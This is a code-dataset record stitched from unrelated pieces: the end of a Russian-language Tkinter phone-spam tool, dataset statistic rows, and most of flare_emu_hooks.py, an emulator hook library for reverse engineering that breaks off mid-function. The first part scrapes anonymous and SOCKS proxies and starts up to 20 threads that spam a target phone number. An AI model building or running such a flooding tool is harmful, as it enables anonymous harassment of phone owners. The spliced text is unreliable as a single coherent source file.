def get(self):
if self.qsize() != 0:
return self.queue.pop()
def put(self, item):
if item not in self.queue:
self.queue.append(item)
def qsize(self):
return len(self.queue)
def __str__(self):
return str(self.queue)
class Proxy:
def __init__(self):
self.anony_proxis = 'https://free-proxy-list.net/anonymous-proxy.html'
self.new_proxies = 'https://free-proxy-list.net'
self.socks_proxies = 'https://socks-proxy.net'
self.ssl_proxies = 'https://sslproxies.org'
self.qproxy = None
self.psize = 0
self.country = None
self.port = None
def fetch(self, url):
proxies = bs(get(url).text, 'html.parser').find('tbody').findAll('tr')
for proxy in proxies:
pjson = self.parse(proxy.findAll('td'))
if pjson:
if self.psize:
if self.qproxy.qsize() < self.psize:
self.qproxy.put(pjson)
else:
break
else:
self.qproxy.put(pjson)
def parse(self, proxy):
pjson = {'ip':proxy[0].string,
'port':proxy[1].string, 'anonymity':proxy[4].string,
'country':proxy[3].string,
'updated':proxy[7].string,
'https':proxy[6].string}
if all([self.country, self.port]):
if pjson['country'] == self.country:
if pjson['port'] == self.port:
return pjson
elif self.port:
if self.port != pjson['port']:
return
return pjson
elif self.country:
if self.country != pjson['country']:
return
return pjson
else:
return pjson
def scrape(self, size=None, port=None, country=None, new_proxies=False, anony_proxies=False, socks_proxies=False, ssl_proxies=False):
self.port = str(port) if port else None
self.country = country
self.qproxy = Queue()
self.psize = size
if new_proxies:
self.fetch(self.new_proxies)
if anony_proxies:
self.fetch(self.anony_proxies)
if socks_proxies:
self.fetch(self.socks_proxies)
if ssl_proxies:
self.fetch(self.ssl_proxies)
proxies = self.qproxy
self.qproxy = Queue()
return proxies
def download():
prx = Proxy()
proxies = prx.scrape(new_proxies=True, size=10)
f = open('proxy.txt', 'w')
while 1:
if proxies.qsize():
proxy = proxies.get()
f.write('http socks5://' + proxy['ip'] + ':' + proxy['port'] + '\n')
f.close()
messagebox.showinfo(title='Proxy загружены', message=('Путь к файлу: ' + os.path.dirname(os.path.abspath(__file__)) + '\\proxy.txt'))
var = IntVar()
check = Checkbutton(root, text='Использовать PROXY', variable=var, onvalue=1, offvalue=0)
check.pack()
check.place(x=350, y=50)
def StartThread():
number = text1.get('1.0', 'end')
try:
thrade = int(text2.get('1.0', 'end'))
except:
messagebox.showinfo(title='Warning', message='Не корректный формат потоков')
try:
if thrade > 20:
messagebox.showinfo(title='Warning', message='Слишком большое количество потоков')
except:
pass
if var.get() == 1:
spam = spamProxy
try:
if file_name == None:
pass
except:
messagebox.showinfo(title='Warning', message='Не указан файл с proxy')
try:
if len(number) < 12 or file_name == None:
messagebox.showinfo(title='Warning', message='Недостаточно цифр')
else:
messagebox.showinfo(title='GOOD', message='Спам запущен')
for i in range(thrade):
t = threading.Thread(target=spam, args=(number,))
t.start()
except:
pass
else:
spam = spamNOproxy
if len(number) < 12:
messagebox.showinfo(title='Warning', message='Недостаточно цифр')
else:
messagebox.showinfo(title='GOOD', message='Спам запущен')
for i in range(thrade):
t = threading.Thread(target=spam, args=(number,))
t.start()
def fileopen():
global file_name
file_name = fd.askopenfilename(filetypes=(('TXT files', '*.txt'), ('HTML files', '*.html;*.htm'),
('All files', '*.*')))
root.resizable(False, False)
text1 = Text(root, height=1, width=15, font='Arial 14')
text1.pack()
text1.place(x=15, y=25)
text2 = Text(root, height=1, width=2, font='Arial 14')
text2.pack()
text2.place(x=15, y=85)
file = Button(text='Выбрать файл с proxy', command=fileopen)
file.pack()
file.place(x=15, y=120)
file = Button(text='Загрузить proxy из интернета', command=download)
file.pack()
file.place(x=15, y=160)
label1 = Label(text='Введите номер в формате 7XXXXXXXXXX', fg='#912700', bg='#849187')
label1.pack()
label1.place(x=15, y=55)
label2 = Label(text='Потоки (не больше 20)', fg='#912700', bg='#849187')
label2.pack()
label2.place(x=50, y=90)
crack = Button(text='Старт', height=2, width=12, background='green', command=StartThread)
crack.pack()
crack.place(x=215, y=235)
root.mainloop()
| 42.807474
| 683
| 0.543495
| 5,665
| 52,696
| 4.978288
| 0.124272
| 0.053188
| 0.101057
| 0.111694
| 0.892384
| 0.887313
| 0.887313
| 0.880079
| 0.880079
| 0.877101
| 0
| 0.033424
| 0.288599
| 52,696
| 1,230
| 684
| 42.842276
| 0.71887
| 0
| 0
| 0.729626
| 0
| 0.030681
| 0.336028
| 0.03478
| 0.001918
| 0
| 0
| 0
| 0
| 1
| 0.016299
| false
| 0.027804
| 0.010547
| 0.001918
| 0.038351
| 0.011505
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c47012aba36e16d861621b317278fa9877b634ea
| 29,468
|
py
|
Python
|
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | 5
|
2020-05-24T06:53:03.000Z
|
2021-09-08T09:36:57.000Z
|
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | null | null | null |
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | 2
|
2020-05-24T06:53:04.000Z
|
2020-12-28T03:15:32.000Z
|
import flare_emu
# return a fake handle value
def _returnHandleHook(eh, address, argv, funcName, userData):
eh.uc.reg_write(eh.regs["ret"], 42)
def _returnParam1Hook(eh, address, argv, funcName, userData):
eh.uc.reg_write(eh.regs["ret"], argv[0])
def _allocMem1Hook(eh, address, argv, funcName, userData):
allocSize = argv[0]
allocSize = eh._checkMemSize(allocSize, userData)
eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(allocSize))
def _allocMem2Hook(eh, address, argv, funcName, userData):
allocSize = argv[1]
allocSize = eh._checkMemSize(allocSize, userData)
eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(allocSize))
def _allocMem3Hook(eh, address, argv, funcName, userData):
allocSize = argv[2]
allocSize = eh._checkMemSize(allocSize, userData)
eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(allocSize))
def _callocHook(eh, address, argv, funcName, userData):
allocSize = argv[0] * argv[1]
allocSize = eh._checkMemSize(allocSize, userData)
eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(allocSize))
# deny "in place only" flag
def _heapReAllocHook(eh, address, argv, funcName, userData):
HEAP_REALLOC_IN_PLACE_ONLY = 0x10
if argv[1] & HEAP_REALLOC_IN_PLACE_ONLY:
eh.uc.reg_write(eh.regs["ret"], 0)
else:
allocSize = argv[3]
allocSize = eh._checkMemSize(allocSize, userData)
region = eh.getEmuMemRegion(argv[2])
if region is not None:
allocSize = max(region[1] - region[0], allocSize)
memAddr = eh.allocEmuMem(allocSize)
eh.copyEmuMem(memAddr, region[0], region[1] - region[0], userData)
else:
memAddr = eh.allocEmuMem(allocSize)
eh.uc.reg_write(eh.regs["ret"], memAddr)
def _reallocHook(eh, address, argv, funcName, userData):
allocSize = argv[1]
allocSize = eh._checkMemSize(allocSize, userData)
region = eh.getEmuMemRegion(argv[0])
if region is not None:
allocSize = max(region[1] - region[0], allocSize)
memAddr = eh.allocEmuMem(allocSize)
eh.copyEmuMem(memAddr, region[0], region[1] - region[0], userData)
else:
memAddr = eh.allocEmuMem(allocSize)
eh.uc.reg_write(eh.regs["ret"], memAddr)
# allocate regardless of commit flag, keep a mapping of requested addr -> actual addr
def _virtualAllocHook(eh, address, argv, funcName, userData):
allocAddr = argv[0]
if allocAddr in eh.allocMap:
eh.uc.reg_write(eh.regs["ret"], eh.allocMap[allocAddr][0])
return
allocSize = argv[1]
allocSize = eh._checkMemSize(allocSize, userData)
memAddr = eh.allocEmuMem(allocSize, allocAddr)
eh.allocMap[allocAddr] = (memAddr, allocSize)
eh.uc.reg_write(eh.regs["ret"], memAddr)
# handle same as VirtualAlloc hook, just with different argument placement
def _virtualAllocExHook(eh, address, argv, funcName, userData):
allocAddr = argv[1]
if allocAddr in eh.allocMap:
eh.uc.reg_write(eh.regs["ret"], eh.allocMap[allocAddr][0])
return
allocSize = argv[2]
allocSize = eh._checkMemSize(allocSize, userData)
memAddr = eh.allocEmuMem(allocSize, allocAddr)
eh.allocMap[allocAddr] = (memAddr, allocSize)
eh.uc.reg_write(eh.regs["ret"], memAddr)
def _memcpyHook(eh, address, argv, funcName, userData):
copySize = argv[2]
copySize = eh._checkMemSize(copySize, userData)
srcRegion = eh.getEmuMemRegion(argv[1])
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for memcpy @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(copySize))
argv[0] = dstRegion[0]
if srcRegion is None:
logging.debug("source memory does not exist for memcpy @%s" % eh.hexString(address))
else:
if copySize <= srcRegion[1] - argv[1] and copySize <= dstRegion[1] - argv[0]:
eh.copyEmuMem(argv[0], argv[1], copySize, userData)
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], argv[0])
def _strlenHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
eh.uc.reg_write(eh.regs["ret"], len(eh.getEmuString(argv[0])))
else:
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcslenHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
eh.uc.reg_write(eh.regs["ret"], len(eh.getEmuWideString(argv[0]).decode("utf-16le") ))
else:
eh.uc.reg_write(eh.regs["ret"], 0)
def _strnlenHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[1], userData)
if eh.isValidEmuPtr(argv[0]):
strlen = len(eh.getEmuString(argv[0]))
strlen = min(strlen, strnlen)
eh.uc.reg_write(eh.regs["ret"], strlen)
else:
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsnlenHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[1], userData)
if eh.isValidEmuPtr(argv[0]):
strlen = len(eh.getEmuWideString(argv[0]).decode("utf-16le"))
if strlen > strnlen:
strlen = argv[1]
eh.uc.reg_write(eh.regs["ret"], strnlen)
else:
eh.uc.reg_write(eh.regs["ret"], 0)
def _strcmpHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuString(argv[1])
str2 = eh.getEmuString(argv[0])
if str1 == str2:
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _strncmpHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[2], userData)
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuString(argv[1])
str2 = eh.getEmuString(argv[0])
if str1[:strnlen] == str2[:strnlen]:
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _stricmpHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuString(argv[1])
str2 = eh.getEmuString(argv[0])
if str1.lower() == str2.lower():
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _strnicmpHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[2], userData)
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuString(argv[1])
str2 = eh.getEmuString(argv[0])
if str1[:strnlen].lower() == str2[:strnlen].lower():
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcscmpHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuWideString(argv[1]).decode("utf-16le")
str2 = eh.getEmuWideString(argv[0]).decode("utf-16le")
if str1 == str2:
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcsncmpHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[2], userData)
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuWideString(argv[1]).decode("utf-16le")
str2 = eh.getEmuWideString(argv[0]).decode("utf-16le")
if str1[:strnlen] == str2[:strnlen]:
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcsicmpHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuWideString(argv[1]).decode("utf-16le")
str2 = eh.getEmuWideString(argv[0]).decode("utf-16le")
if str1.lower() == str2.lower():
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcsnicmpHook(eh, address, argv, funcName, userData):
strnlen = eh._checkMemSize(argv[2], userData)
if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
str1 = eh.getEmuWideString(argv[1]).decode("utf-16le")
str2 = eh.getEmuWideString(argv[0]).decode("utf-16le")
if str1[:strnlen].lower() == str2[:strnlen].lower():
eh.uc.reg_write(eh.regs["ret"], 0)
return
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _strcpyHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuString(argv[1]) + b"\x00"
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for strcpy @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(len(src)))
argv[0] = dstRegion[0]
if len(src) <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src)
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _strncpyHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
strnlen = eh._checkMemSize(argv[2], userData)
src = eh.getEmuString(argv[1])
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for strncpy @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
argv[0] = dstRegion[0]
if strnlen <= dstRegion[1] - argv[0]:
if strnlen > len(src):
src = src.ljust(strnlen, b"\x00")
eh.writeEmuMem( argv[0], src)
eh.uc.reg_write( eh.regs["ret"], argv[0] )
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _strncpysHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[2]):
strnlen = eh._checkMemSize(argv[3], userData)
src = eh.getEmuString(argv[2])
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for strncpy_s @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
argv[0] = dstRegion[0]
strnlen = min(strnlen, len(src))
if strnlen + 1 <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src + b"\x00")
eh.uc.reg_write(eh.regs["ret"], 0)
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcscpyHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuWideString(argv[1]) + b"\x00\x00"
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wcscpy @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(len(src)))
argv[0] = dstRegion[0]
if len(src) <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src)
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcsncpyHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
strnlen = eh._checkMemSize(argv[2] * 2, userData)
src = eh.getEmuWideString(argv[1])
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wcsncpy @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
argv[0] = dstRegion[0]
if strnlen <= dstRegion[1] - argv[0]:
if strnlen > len(src):
src = src.ljust(strnlen, b"\x00")
eh.writeEmuMem(argv[0], src)
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _wcsncpysHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[2]):
strnlen = eh._checkMemSize(argv[3] * 2, userData)
src = eh.getEmuWideString(argv[2])
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wcsncpy_s @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
argv[0] = dstRegion[0]
strnlen = min(strnlen, len(src))
if strnlen + 2 <= dstRegion[1] - argv[0]:
src = src[:strnlen] + b"\x00\x00"
eh.writeEmuMem(argv[0], src)
eh.uc.reg_write(eh.regs["ret"], 0)
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
if eh.size_pointer == 8:
val = 0xffffffffffffffff
else:
val = 0xffffffff
eh.uc.reg_write(eh.regs["ret"], val)
def _memchrHook(eh, address, argv, funcName, userData):
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is not None:
srch = chr(argv[1] & 0xFF)
srchlen = argv[2]
# truncate search to end of region
if argv[0] + srchlen > dstRegion[1]:
srchlen = dstRegion[1] - argv[0]
buf = eh.uc.mem_read(argv[0], srchlen)
offs = buf.find(srch)
if offs > -1:
eh.uc.reg_write(eh.regs["ret"], argv[0] + offs)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _mbtowcHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuString(argv[1]).decode("latin1")[0]
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(0x1000))
argv[0] = dstRegion[0]
eh.writeEmuMem(argv[0], src.encode("utf-16le")[0:2] + b"\x00\x00")
eh.uc.reg_write(eh.regs["ret"], 1)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _mbstowcsHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
maxBufSize = eh._checkMemSize(argv[2] * 2, userData)
src = eh.getEmuString(argv[1])
if len(src) < argv[2]:
src += b"\x00"
else:
src = src[:argv[2]]
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(maxBufSize))
argv[0] = dstRegion[0]
if len(src) * 2 + 2 <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src.decode("latin1").encode("utf-16le") + b"\x00\x00")
eh.uc.reg_write(eh.regs["ret"], len(src.replace(b"\x00", b"")))
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], 0)
def _wctombHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuWideString(argv[1]).decode("utf-16le")
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wctomb variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(0x1000))
argv[0] = dstRegion[0]
eh.writeEmuMem(argv[0], src[0].encode("utf-16le"))
eh.uc.reg_write(eh.regs["ret"], 1)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcstombsHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
bufSize = eh._checkMemSize(argv[2], userData)
src = eh.getEmuWideString(argv[1]).decode("utf-16le")
if len(src) < argv[2]:
src += "\x00"
else:
src = src[:argv[2]]
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wctomb variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(bufSize))
argv[0] = dstRegion[0]
if bufSize + 1 <= dstRegion[1] - argv[0]:
if bufSize > len(src):
src = src.ljust(bufSize, "\x00")
eh.writeEmuMem(argv[0], (src + "\x00").encode("utf-16le") )
eh.uc.reg_write(eh.regs["ret"], len(src.replace("\x00", "")))
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], 0)
def _multiByteToWideCharHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[2]):
src = eh.getEmuString(argv[2])
srcLen = eh.getSignedValue(argv[3])
if srcLen == -1:
src += b"\x00"
maxBufSize = eh._checkMemSize(len(src) * 2, userData)
else:
maxBufSize = eh._checkMemSize(srcLen * 2, userData)
if len(src) < srcLen:
src += b"\x00"
elif srcLen != -1:
src = src[:srcLen]
if argv[5] == 0:
eh.uc.reg_write(eh.regs["ret"], len(src) * 2)
return
dstRegion = eh.getEmuMemRegion(argv[4])
if dstRegion is None:
logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(maxBufSize))
argv[4] = dstRegion[0]
if len(src) * 2 + 2 <= dstRegion[1] - argv[4]:
eh.writeEmuMem(argv[4], src.decode("latin1").encode("utf-16le") + b"\x00\x00")
eh.uc.reg_write(eh.regs["ret"], len(src))
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], 0)
def _wideCharToMultiByteHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[2]):
src = eh.getEmuWideString(argv[2]).decode("utf-16le")
srcLen = eh.getSignedValue(argv[3])
if srcLen == -1:
src += "\x00"
maxBufSize = eh._checkMemSize(len(src), userData)
else:
maxBufSize = eh._checkMemSize(srcLen, userData)
if len(src) < srcLen:
src += "\x00"
elif srcLen != -1:
src = src[:srcLen]
if argv[5] == 0:
eh.uc.reg_write(eh.regs["ret"], len(src))
return
dstRegion = eh.getEmuMemRegion(argv[4])
if dstRegion is None:
logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(maxBufSize))
argv[4] = dstRegion[0]
if len(src) + 1 <= dstRegion[1] - argv[4]:
eh.writeEmuMem(argv[4], (src + "\x00").encode("latin1") )
eh.uc.reg_write(eh.regs["ret"], len(src))
return
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], 0)
def _memsetHook(eh, address, argv, funcName, userData):
setSize = argv[2]
setSize = eh._checkMemSize(setSize, userData)
dstRegion = eh.getEmuMemRegion(argv[0])
src = chr(argv[1] & 0xFF).encode("latin1")
if dstRegion is None:
logging.debug("dest memory does not exist for memset @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(setSize))
argv[0] = dstRegion[0]
if setSize <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src * setSize)
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], argv[0])
def _bzeroHook(eh, address, argv, funcName, userData):
setSize = argv[1]
setSize = eh._checkMemSize(setSize, userData)
dstRegion = eh.getEmuMemRegion(argv[0])
src = b"\x00"
if dstRegion is None:
logging.debug("dest memory does not exist for memset @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(setSize))
argv[0] = dstRegion[0]
if setSize <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], src * setSize)
else:
logging.debug("dest memory not large enough @%s" % eh.hexString(address))
eh.uc.reg_write(eh.regs["ret"], argv[0])
def _strcatHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuString(argv[1]) + b"\x00"
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for strcat @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(len(src) + 1))
argv[0] = dstRegion[0]
dst = eh.getEmuString(argv[0])
if len(dst) + len(src) <= dstRegion[1] - argv[0]:
eh.writeEmuMem( argv[0], dst + src )
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _strncatHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
strnlen = eh._checkMemSize(argv[2], userData)
src = eh.getEmuString(argv[1])
strnlen = min(strnlen, len(src))
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for strncat @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen + 1))
argv[0] = dstRegion[0]
dst = eh.getEmuString(argv[0])
if len(dst) + strnlen + 1 <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], dst + src[:strnlen] + b"\x00" )
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcscatHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
src = eh.getEmuWideString(argv[1]) + b"\x00\x00"
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wcscat @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(len(src)))
argv[0] = dstRegion[0]
dst = eh.getEmuWideString(argv[0])
if len(dst) + len(src) <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], dst + src )
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsncatHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[1]):
strnlen = eh._checkMemSize(argv[2], userData)
src = eh.getEmuWideString(argv[1])
strnlen = min(strnlen * 2, len(src))
dstRegion = eh.getEmuMemRegion(argv[0])
if dstRegion is None:
logging.debug("dest memory does not exist for wcsncat @%s" % eh.hexString(address))
dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen + 2))
argv[0] = dstRegion[0]
dst = eh.getEmuWideString(argv[0])
if len(dst) + strnlen + 2 <= dstRegion[1] - argv[0]:
eh.writeEmuMem(argv[0], dst + src[:strnlen] + b"\x00\x00")
eh.uc.reg_write(eh.regs["ret"], argv[0])
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _strchrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuString(argv[0]).decode("latin1")
idx = s.find(chr(argv[1] & 0xFF))
if idx != -1:
eh.uc.reg_write(eh.regs["ret"], argv[0] + idx)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcschrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuWideString(argv[0]).decode("utf-16le")
idx = s.find(chr(argv[1] & 0xFF))
if idx != -1:
eh.uc.reg_write(eh.regs["ret"], argv[0] + idx * 2)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _strrchrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuString(argv[0]).decode("latin1")
idx = s.rfind(chr(argv[1] & 0xFF))
if idx != -1:
eh.uc.reg_write(eh.regs["ret"], argv[0] + idx)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsrchrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuWideString(argv[0]).decode("utf-16le")
idx = s.rfind(chr(argv[1] & 0xFF))
if idx != -1:
eh.uc.reg_write(eh.regs["ret"], argv[0] + idx * 2)
return
eh.uc.reg_write(eh.regs["ret"], 0)
def _strlwrHook(eh, address, argv, funcName, userData):
if eh.isValidEmuPtr(argv[0]):
s = eh.getEmuString(argv[0]).decode("latin1")
